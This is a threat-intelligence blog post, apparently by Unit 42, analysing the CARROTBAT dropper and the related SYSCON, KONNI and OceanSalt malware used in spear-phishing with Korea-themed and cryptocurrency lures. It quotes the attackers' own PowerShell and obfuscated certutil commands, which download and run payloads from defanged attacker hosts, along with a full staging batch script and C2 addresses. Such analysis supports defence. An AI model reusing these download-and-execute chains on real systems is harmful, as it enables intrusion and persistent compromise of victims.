This post is also available in: 日本語 (Japanese)
Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events. Based on various information witnessed within this dropper, Unit 42 has dubbed this malware family CARROTBAT.
CARROTBAT was initially discovered in an attack on December 2017. This attack was made against a British government agency using the SYSCON malware family. SYSCON is a simple remote access Trojan (RAT) that uses the file transfer protocol (FTP) for network communications. While there is no evidence that this attack against a British government agency made use of the CARROTBAT dropper, we found overlaps within this attack’s infrastructure that ultimately lead us to CARROTBAT’s initial discovery, as well as other ties between these two malware families.
In total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique decoy documents. These samples began appearing in March of this year, with the majority of activity taking place within the past 3 months. The payloads vary, as earlier instances delivered SYSCON, while newer instances are delivering the previously reported OceanSalt malware family. CARROTBAT and their associated payloads constitute a campaign that we are dubbing ‘Fractured Block’.
On December 13, 2017, a spear phishing email was sent from the email address of yuri.sidorav@yandex[.]ru to a high ranking individual within a British government agency. This email contained the following subject, with an attached document file of the same name:
- US. would talk with North Korea “without precondition”
Within this attached Word document, the following text is displayed:
U.S. would talk with North Korea “without precondition”: Tillerson, By Seungmock Oh
This text references an article that was published on the same day as the attack by NKNews[.]org. The article in question discusses diplomatic ties between the United States and North Korea.
Figure 1 Article referenced by decoy document in attack against British government agency
The attached document leverages a DDE exploit to ultimately execute the following code:
c:\\windows\\system32\\cmd.exe "/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')
Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it. The command run by this particular malware sample attempts to download a remote executable file named 0_31.doc, which in turn is placed within the victim’s %TEMP% directory with the filename of AAA.exe prior to being executed.
The payload in question belongs to the SYSCON malware family. It communicates with ftp.bytehost31[.]org via FTP for command and control (C2).
Figure 2 SYSCON network traffic witnessed during execution
Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family. Pivoting further on characteristics belonging to CARROTBAT ultimately led to the identification of 29 unique samples in this malware family.
Fractured Block Campaign
The campaign dubbed Fractured Block encompasses all CARROTBAT samples identified to date. CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine. In total, the following 11 decoy document file formats are supported by this malware:
After the embedded decoy document is opened, an obfuscated command such as the following is executed on the system:
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit
This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility. More information on this technique and the CARROTBAT malware family may be found within the Appendix.
The 29 unique CARROTBAT malware samples have compile timestamps between March 2018 to September 2018. Of these 29 unique samples, 11 unique decoy documents were leveraged in attacks, as seen in the figure below:
Figure 3 Timeline of decoy documents being dropped by CARROTBAT
A majority of the decoy documents targeting victims in Korea had subject matter related to cryptocurrencies. In one unique case, the decoy contains a business card belonging to an individual working at COINVIL, which is an organization that announced plans to build a cryptocurrency exchange in the Philippines in May 2018.
Additional lure subjects included timely political events, such as relations between the U.S. and North Korea, as well as a trip by U.S. President Donald Trump to a summit in Singapore.
Payloads for the CARROTBAT samples varied. Originally, between the periods of March 2018 to July 2018, multiple instances of the SYSCON malware family were observed. These samples communicated with the following hosts via FTP for C2 communication:
Beginning in June 2018, we observed the OceanSalt malware family being dropped by CARROTBAT. These samples continue to be used at the time of this writing, and were observed communicating with the following host for C2 communication:
Interesting Ties with Other Threat Activity
As stated earlier within this blog, there is infrastructure overlap between the CARROTBAT and KONNI malware families. KONNI is a RAT that is believed to have been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure. This particular malware family has yet to be attributed to a named group at the time of this writing, however, targeting has historically focused on the Southeast Asia region.
Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication.
Below you can see the KONNI usage highlighted in the gold flags and SYSCON highlighted in the purple flags.
Figure 4 Maltego diagram correlating malicious activity
Finally, the third overlap is the OceanSalt malware payload. First reported by McAfee in October 2018, reported victims include South Korea, the United States, and Canada. Like the samples outlined in the McAfee report, the OceanSalt samples observed in the Fractured Block Campaign employed the same code similarities as those of Comment Crew (aka APT1), however, we believe that these code similarities are a false flag. The malware used by Comment Crew has been in circulation for many years, and we do not believe the activity outlined in this blog post has any overlap with the older Comment Crew activity.
Figure 5 Threat activity overlap over time
Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity. The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.
The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated.
While the actors behind Fractured Block remain active,
Palo Alto Networks customers are protected from this threat in the following ways:
- AutoFocus customers can track these samples with the FracturedBlock, SYSCON, KONNI, and CARROTBAT
- WildFire detects all files mentioned in this report with malicious verdicts.
- Traps blocks all of the files currently associated with the Fractured Block campaign.
A special thanks to Chronicle’s VirusTotal team for their assistance researching this threat.
CARROTBAT Technical Analysis
For the analysis below, the following sample is used:
|File Type||PE32 executable (GUI) Intel 80386, for MS Windows|
|Compile Timestamp||2018-09-05 00:17:22 UTC|
Upon execution, the malware will read the last 8 bytes of itself. These bytes include two DWORDs that contain both the length of the embedded decoy document, as well as the type of file it is.
Figure 6 End of CARROTBAT file containing decoy document information
Using this gathered information, CARROTBAT continues to read the end of itself, minus the previously retrieved 8 bytes. This data contains the entirety of the embedded decoy document and is written to the same directory and filename as the original malware sample. However, the file extension is changed based on the previously retrieved file type value. The following corresponding values are used by CARROTBAT:
In this particular case, the .hwp file extension is used for the decoy document. After the decoy is dropped to disk, it is opened in a new process. In this instance, the whitepaper for the BKN Bank cryptocurrency exchange is displayed to the victim:
Figure 7 HWP decoy document displayed to victim
After this document is displayed, the malware will continue to execute the following command in a new process:
C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit
This command will download a remote file using the built-in Microsoft Windows certutil command. In this particular instance, the following script is retrieved:
:if exist "%PROGRAMFILES(x86)%" (GOTO 64BITOS) ELSE (GOTO 32BITOS)
certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul
certutil -decode -f setup.txt setup.cab > nul
del /f /q setup.txt > nul
:certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul
:certutil -d^ecode -f setup2.txt setup.cab > nul
:del /f /q setup2.txt > nul
if exist "setup.cab" (GOTO EXECUTE) ELSE (GOTO EXIT)
ver | findstr /i "10\." > nul
IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS)
expand %TEMP%\setup.cab -F:* %CD% > nul
:if exist "%PROGRAMFILES(x86)%" (rundll32 %TEMP%\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\drv.dll EntryPoint)
wusa %TEMP%\setup.cab /quiet /extract:%TEMP% > nul
del /f /q setup.cab > nul
del /f /q %~dpnx0 > nul
This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting.
Figure 8 CARROTBAT downloading final payload via certutil
The downloaded CAB file has the following properties:
|File Type||Microsoft Cabinet archive data, 181248 bytes, 3 files|
The following three files and their descriptions are dropped by this CAB file:
|Install.bat||Installation batch script responsible for copying the other files to C:\Users\Public\Downloads and setting the Run registry key to ensure persistence. It will also remove any original files before exiting.|
|DrvUpdate.dll||Instance of the OceanSalt malware family.|
|winnet.ini||Encoded C2 information.|
The C2 information is stored via the external winnet.ini file and is encoded using an incremental XOR key. The following function written in Python may be used to decode this file:
out = ""
c = 0
for d in data:
out += chr(ord(d)^c)
Once decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on port 7117.
SYSCON Payload Samples
OceanSalt Payload Samples